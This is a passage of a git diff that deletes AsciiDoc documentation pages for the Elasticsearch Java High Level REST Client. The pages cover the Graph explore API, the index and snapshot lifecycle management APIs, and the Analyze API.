- -Using the `Cancellable` instance is optional and you can safely ignore this if you have -no need for this. A use case for this would be using this with e.g. Kotlin's `suspendCancellableCoRoutine`. - diff --git a/docs/java-rest/high-level/graph/explore.asciidoc b/docs/java-rest/high-level/graph/explore.asciidoc deleted file mode 100644 index a178dfbc3a4..00000000000 --- a/docs/java-rest/high-level/graph/explore.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[role="xpack"] -[[java-rest-high-x-pack-graph-explore]] -=== X-Pack Graph explore API - -[[java-rest-high-x-pack-graph-explore-execution]] -==== Initial request - -Graph queries are executed using the `explore()` method: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-request] --------------------------------------------------- -<1> In this example we seed the exploration with a query to find messages mentioning the mysterious `projectx` -<2> What we want to discover in these messages are the ids of `participants` in the communications and the md5 hashes -of any attached files. In each case, we want to find people or files that have had at least one document connecting them -to projectx. -<3> The next "hop" in the graph exploration is to find the people who have shared several messages with the people or files -discovered in the previous hop (the projectx conspirators). The `minDocCount` control is used here to ensure the people -discovered have had at least 5 communications with projectx entities. Note we could also supply a "guiding query" here e.g. a -date range to consider only recent communications but we pass null to consider all connections. -<4> Finally we call the graph explore API with the GraphExploreRequest object. - - -==== Response - -Graph responses consist of Vertex and Connection objects (aka "nodes" and "edges" respectively): - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-response] --------------------------------------------------- -<1> Each Vertex is a unique term (a combination of fieldname and term value). The "hopDepth" property tells us at which point in the -requested exploration this term was first discovered. -<2> Each Connection is a pair of Vertex objects and includes a docCount property telling us how many times these two -Vertex terms have been sighted together - - -[[java-rest-high-x-pack-graph-expand-execution]] -==== Expanding a client-side Graph - -Typically once an application has rendered an initial GraphExploreResponse as a collection of vertices and connecting lines (graph visualization toolkits such as D3, sigma.js or Keylines help here) the next step a user may want to do is "expand". This involves finding new vertices that might be connected to the existing ones currently shown. - -To do this we use the same `explore` method but our request contains details about which vertices to expand from and which vertices to avoid re-discovering. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/GraphDocumentationIT.java[x-pack-graph-explore-expand] --------------------------------------------------- -<1> Unlike the initial request we do not need to pass a starting query -<2> In the first hop which represents our "from" vertices we explicitly list the terms that we already have on-screen and want to expand by using the `addInclude` filter. -We can supply a boost for those terms that are considered more important to follow than others but here we select a common value of 1 for all. -<3> When defining the second hop which represents the "to" vertices we hope to discover we explicitly list the terms that we already know about using the `addExclude` filter - diff --git a/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc deleted file mode 100644 index a68a2d9de5b..00000000000 --- a/docs/java-rest/high-level/ilm/delete_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-delete-lifecycle-policy -:request: DeleteLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Delete Lifecycle Policy API allows you to delete an Index Lifecycle -Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy named `my_policy` will be deleted. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete lifecycle policy request was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index 4079ac3dc08..00000000000 --- a/docs/java-rest/high-level/ilm/delete_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-delete-snapshot-lifecycle-policy -:request: DeleteSnapshotLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Delete Snapshot Lifecycle Policy API allows you to delete a Snapshot Lifecycle Management Policy -from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy with the id `policy_id` will be deleted. - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the delete snapshot lifecycle policy request was received. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the delete snapshot lifecycle policy request was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index b2c36a4e273..00000000000 --- a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-execute-snapshot-lifecycle-policy -:request: ExecuteSnapshotLifecyclePolicyRequest -:response: ExecuteSnapshotLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Execute Snapshot Lifecycle Policy API allows you to execute a Snapshot Lifecycle Management -Policy, taking a snapshot immediately. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The policy id to execute - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the name of the snapshot that was created. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The created snapshot name - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc b/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc deleted file mode 100644 index 190f7be2092..00000000000 --- a/docs/java-rest/high-level/ilm/execute_snapshot_lifecycle_retention.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-execute-snapshot-lifecycle-retention -:request: ExecuteSnapshotLifecycleRetentionRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Execute Snapshot Lifecycle Retention API - - -[id="{upid}-{api}-request"] -==== Request - -The Execute Snapshot Lifecycle Retention API allows you to execute Snapshot Lifecycle Management -Retention immediately, rather than waiting for its regularly scheduled execution. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a boolean for whether the request was -acknowledged by the master node. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc b/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc deleted file mode 100644 index b85d482299a..00000000000 --- a/docs/java-rest/high-level/ilm/explain_lifecycle.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ --- -:api: ilm-explain-lifecycle -:request: ExplainLifecycleRequest -:response: ExplainLifecycleResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Explain Lifecycle API - - -[id="{upid}-{api}-request"] -==== Request - -The Explain Lifecycle API allows you to retrieve information about the execution -of a Lifecycle Policy with respect to one or more indices. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Requests an explanation of policy execution for `my_index` and `other_index` - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `LifecyclePolicyMetadata`, -accessible by the name of the policy, which contains data about each policy, -as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The name of the policy in use for this index, if any. Will be `null` if the -index does not have an associated policy. -<2> Indicates whether this index is being managed by Index Lifecycle Management. -<3> The Phase (`hot`, `warm`, etc.) this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<4> The time this index entered this Phase of execution. -<5> The Action (`rollover`, `shrink`, etc.) this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<6> The Step this index is currently in. Will be `null` if -the index is not managed by Index Lifecycle Management. -<7> If this index is in the `ERROR` Step, this will indicate which Step failed. -Otherwise, it will be `null`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc deleted file mode 100644 index 506c2c736e5..00000000000 --- a/docs/java-rest/high-level/ilm/get_lifecycle_policy.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: ilm-get-lifecycle-policy -:request: GetLifecyclePolicyRequest -:response: GetLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Lifecycle Policy API allows you to retrieve the definition of an Index -Lifecycle Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Gets all policies. 
-<2> Gets `my_policy` and `other_policy` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `LifecyclePolicyMetadata`, -accessible by the name of the policy, which contains data about each policy, -as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The retrieved policies are retrieved by name. -<2> The policy definition itself. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index da51760961c..00000000000 --- a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ --- -:api: slm-get-snapshot-lifecycle-policy -:request: GetSnapshotLifecyclePolicyRequest -:response: GetSnapshotLifecyclePolicyResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Snapshot Lifecycle Policy API allows you to retrieve the definition of a Snapshot Lifecycle -Management Policy from the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Gets all policies. -<2> Gets `policy_id` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains a map of `SnapshotLifecyclePolicyMetadata`, accessible by the id -of the policy, which contains data about each policy, as well as the policy definition. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The retrieved policies are retrieved by id. -<2> The policy definition itself. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc b/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc deleted file mode 100644 index c9ff0a9880c..00000000000 --- a/docs/java-rest/high-level/ilm/get_snapshot_lifecycle_stats.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-get-snapshot-lifecycle-stats -:request: GetSnapshotLifecycleStatsRequest -:response: GetSnapshotLifecycleStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get Snapshot Lifecycle Stats API - - -[id="{upid}-{api}-request"] -==== Request - -The Get Snapshot Lifecycle Stats API allows you to retrieve statistics about snapshots taken or -deleted, as well as retention runs by the snapshot lifecycle service. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains global statistics as well as a map of `SnapshotPolicyStats`, -accessible by the id of the policy, which contains statistics about each policy. 
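Looking back at the Get Snapshot Lifecycle Policy API described above, the following is a hedged editorial sketch of retrieving a single policy by id and pulling out its definition. The policy id `daily-snapshots` and the `client` instance are assumptions, imports are omitted, and the exact response accessors may differ across client versions.

["source","java"]
--------------------------------------------------
// Fetch a single SLM policy by its id (hypothetical id "daily-snapshots")
GetSnapshotLifecyclePolicyRequest request =
    new GetSnapshotLifecyclePolicyRequest("daily-snapshots");

GetSnapshotLifecyclePolicyResponse response =
    client.indexLifecycle().getSnapshotLifecyclePolicy(request, RequestOptions.DEFAULT);

// Policies in the response are keyed by policy id
SnapshotLifecyclePolicyMetadata metadata = response.getPolicies().get("daily-snapshots");
SnapshotLifecyclePolicy policy = metadata.getPolicy();
--------------------------------------------------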
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc b/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc deleted file mode 100644 index 6bf4344477e..00000000000 --- a/docs/java-rest/high-level/ilm/lifecycle_management_status.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-status -:request: LifecycleManagementStatusRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Index Lifecycle Management Status API - - -[id="{upid}-{api}-request"] -==== Request - -The Index Lifecycle Management Status API allows you to retrieve the status -of Index Lifecycle Management - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the status of Index Lifecycle Management. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The returned status can be `RUNNING`, `STOPPING`, or `STOPPED`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc deleted file mode 100644 index 7947f54ffbc..00000000000 --- a/docs/java-rest/high-level/ilm/put_lifecycle_policy.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-put-lifecycle-policy -:request: PutLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Put Lifecycle Policy API allows you to add an Index Lifecycle Management -Policy to the cluster. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Adds a hot phase with a rollover action -<2> Adds a delete phase that will delete in the index 90 days after rollover -<3> Creates the policy with the defined phases and the name `my_policy` - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the put lifecycle policy was acknowledged. 
- -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc deleted file mode 100644 index 13a0bb6e782..00000000000 --- a/docs/java-rest/high-level/ilm/put_snapshot_lifecycle_policy.asciidoc +++ /dev/null @@ -1,35 +0,0 @@ --- -:api: slm-put-snapshot-lifecycle-policy -:request: PutSnapshotLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put Snapshot Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Put Snapshot Lifecycle Policy API allows you to add or update the definition of a Snapshot -Lifecycle Management Policy in the cluster. - -["source","java",subs="attributes,callouts,macros"] -------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] -------------------------------------------------- - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the put snapshot lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] -------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] -------------------------------------------------- -<1> Whether or not the put snapshot lifecycle policy was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc b/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc deleted file mode 100644 index 4b12e89d6aa..00000000000 --- a/docs/java-rest/high-level/ilm/remove_lifecycle_policy_from_index.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-remove-lifecycle-policy-from-index -:request: RemoveIndexLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Remove Policy from Index API - - -[id="{upid}-{api}-request"] -==== Request - -Removes the assigned lifecycle policy from an index. - -["source","java",subs="attributes,callouts,macros"] -------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] -------------------------------------------------- -<1> Removes the `my_policy` policy from `my_index` - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to remove -the lifecycle policy from the index was received. - -["source","java",subs="attributes,callouts,macros"] -------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] -------------------------------------------------- -<1> Whether or not any policies failed -to be removed from any of the requested indices -<2> A list of index names which are still managed -by their policies. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc b/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc deleted file mode 100644 index 2798b1fecfd..00000000000 --- a/docs/java-rest/high-level/ilm/retry_lifecycle_policy.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-retry-lifecycle-policy -:request: RetryLifecyclePolicyRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Retry Lifecycle Policy API - - -[id="{upid}-{api}-request"] -==== Request - -The Retry Lifecycle Policy API allows you to retry execution of policies -on indices where they encountered errors.
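Before the included request snippet, here is a compact editorial sketch of what a retry call might look like. The index name `my_index` matches the callout below, the `client` instance is assumed to be an existing `RestHighLevelClient`, and the method name follows the high-level client but may vary between versions.

["source","java"]
--------------------------------------------------
// Retry the failed step for an index stuck in the ERROR step (hypothetical index name)
RetryLifecyclePolicyRequest request = new RetryLifecyclePolicyRequest("my_index");

AcknowledgedResponse response =
    client.indexLifecycle().retryLifecyclePolicy(request, RequestOptions.DEFAULT);
boolean acknowledged = response.isAcknowledged();
--------------------------------------------------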
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Retries execution of `my_index`'s policy - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the retry lifecycle policy request was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the lifecycle policy retry was acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc b/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc deleted file mode 100644 index ae6986711bc..00000000000 --- a/docs/java-rest/high-level/ilm/snapshot_lifecycle_management_status.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-status -:request: SnapshotLifecycleManagementStatusRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Snapshot Lifecycle Management Status API - - -[id="{upid}-{api}-request"] -==== Request - -The Snapshot Lifecycle Management Status API allows you to retrieve the status -of Snapshot Lifecycle Management - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates the status of Snapshot Lifecycle Management. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The returned status can be `RUNNING`, `STOPPING`, or `STOPPED`. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc deleted file mode 100644 index 20a77259663..00000000000 --- a/docs/java-rest/high-level/ilm/start_lifecycle_management.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: ilm-start-ilm -:request: StartILMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Index Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Start Lifecycle Management API allows you to start Index Lifecycle -Management if it has previously been stopped. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to start Index Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to start Index Lifecycle Management was -acknowledged. 
- -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc deleted file mode 100644 index b359f237ea5..00000000000 --- a/docs/java-rest/high-level/ilm/start_snapshot_lifecycle_management.asciidoc +++ /dev/null @@ -1,36 +0,0 @@ --- -:api: slm-start-slm -:request: StartSLMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start Snapshot Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Start Snapshot Lifecycle Management API allows you to start Snapshot -Lifecycle Management if it has previously been stopped. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to start Snapshot Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to start Snapshot Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] diff --git a/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc deleted file mode 100644 index 04c30e1012f..00000000000 --- a/docs/java-rest/high-level/ilm/stop_lifecycle_management.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: ilm-stop-ilm -:request: StopILMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Index Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Stop Lifecycle Management API allows you to stop Index Lifecycle -Management temporarily. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to stop Index Lifecycle -Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to stop Index Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc b/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc deleted file mode 100644 index 3f54341d430..00000000000 --- a/docs/java-rest/high-level/ilm/stop_snapshot_lifecycle_management.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ --- -:api: slm-stop-slm -:request: StopSLMRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop Snapshot Lifecycle Management API - - -[id="{upid}-{api}-request"] -==== Request - -The Stop Snapshot Management API allows you to stop Snapshot Lifecycle -Management temporarily. 
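A hedged sketch of the stop/start pair for Snapshot Lifecycle Management, under the same assumptions as the earlier examples (an existing `client`, imports omitted); the `stopSLM` and `startSLM` method names follow the high-level client but may differ by version.

["source","java"]
--------------------------------------------------
// Stop SLM, then start it again once maintenance is done
AcknowledgedResponse stopAck = client.indexLifecycle()
    .stopSLM(new StopSLMRequest(), RequestOptions.DEFAULT);

AcknowledgedResponse startAck = client.indexLifecycle()
    .startSLM(new StartSLMRequest(), RequestOptions.DEFAULT);
--------------------------------------------------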
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- - - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ indicates if the request to stop Snapshot -Lifecycle Management was received. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> Whether or not the request to stop Snapshot Lifecycle Management was -acknowledged. - -include::../execution.asciidoc[] - - diff --git a/docs/java-rest/high-level/index.asciidoc b/docs/java-rest/high-level/index.asciidoc deleted file mode 100644 index 21d78da171c..00000000000 --- a/docs/java-rest/high-level/index.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -:mainid: java-rest-high - -[id="{mainid}"] -= Java High Level REST Client - -[partintro] --- -added[6.0.0-beta1] - -The Java High Level REST Client works on top of the Java Low Level REST client. -Its main goal is to expose API specific methods, that accept request objects as -an argument and return response objects, so that request marshalling and -response un-marshalling is handled by the client itself. - -Each API can be called synchronously or asynchronously. The synchronous -methods return a response object, while the asynchronous methods, whose names -end with the `async` suffix, require a listener argument that is notified -(on the thread pool managed by the low level client) once a response or an -error is received. - -The Java High Level REST Client depends on the Elasticsearch core project. -It accepts the same request arguments as the `TransportClient` and returns -the same response objects. - --- - -:doc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client/documentation -:hlrc-tests: {elasticsearch-root}/client/rest-high-level/src/test/java/org/elasticsearch/client - -include::getting-started.asciidoc[] -include::supported-apis.asciidoc[] -include::java-builders.asciidoc[] -include::migration.asciidoc[] -include::../license.asciidoc[] - -:doc-tests!: -:mainid!: diff --git a/docs/java-rest/high-level/indices/analyze.asciidoc b/docs/java-rest/high-level/indices/analyze.asciidoc deleted file mode 100644 index 9464394fd1e..00000000000 --- a/docs/java-rest/high-level/indices/analyze.asciidoc +++ /dev/null @@ -1,97 +0,0 @@ --- -:api: analyze -:request: AnalyzeRequest -:response: AnalyzeResponse --- - -[id="{upid}-{api}"] -=== Analyze API - -[id="{upid}-{api}-request"] -==== Analyze Request - -An +{request}+ contains the text to analyze, and one of several options to -specify how the analysis should be performed. - -The simplest version uses a built-in analyzer: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-builtin-request] ---------------------------------------------------- -<1> A built-in analyzer -<2> The text to include. 
Multiple strings are treated as a multi-valued field - -You can configure a custom analyzer: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-custom-request] ---------------------------------------------------- -<1> Configuration for a custom tokenfilter -<2> Configure the tokenizer -<3> Configure char filters -<4> Add a built-in tokenfilter -<5> Add the custom tokenfilter - -You can also build a custom normalizer, by including only charfilters and -tokenfilters: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-custom-normalizer-request] ---------------------------------------------------- - -You can analyze text using an analyzer defined in an existing index: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-index-request] ---------------------------------------------------- -<1> The index containing the mappings -<2> The analyzer defined on this index to use - -Or you can use a normalizer: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-index-normalizer-request] ---------------------------------------------------- -<1> The index containing the mappings -<2> The normalizer defined on this index to use - -You can analyze text using the mappings for a particular field in an index: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-field-request] ---------------------------------------------------- - -==== Optional arguments -The following arguments can also optionally be provided: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-explain] ---------------------------------------------------- -<1> Setting `explain` to true will add further details to the response -<2> Setting `attributes` allows you to return only token attributes that you are -interested in - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Analyze Response - -The returned +{response}+ allows you to retrieve details of the analysis as -follows: -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-tokens] ---------------------------------------------------- -<1> `AnalyzeToken` holds information about the individual tokens produced by analysis - -If `explain` was set to `true`, then information is instead returned from the `detail()` -method: - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response-detail] ---------------------------------------------------- -<1> `DetailAnalyzeResponse` holds more detailed information about tokens produced by -the various substeps in the analysis chain. 
